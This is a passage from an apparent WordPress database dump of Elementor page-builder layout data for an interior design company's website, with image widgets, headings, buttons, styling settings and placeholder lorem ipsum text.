flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3827,4865,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3828,4865,'_elementor_pro_version','3.8.1'),(3829,4866,'_wp_page_template','elementor_header_footer'),(3830,4866,'_elementor_edit_mode','builder'),(3831,4866,'_elementor_template_type','wp-page'),(3832,4866,'_elementor_version','3.8.1'),(3833,4866,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad 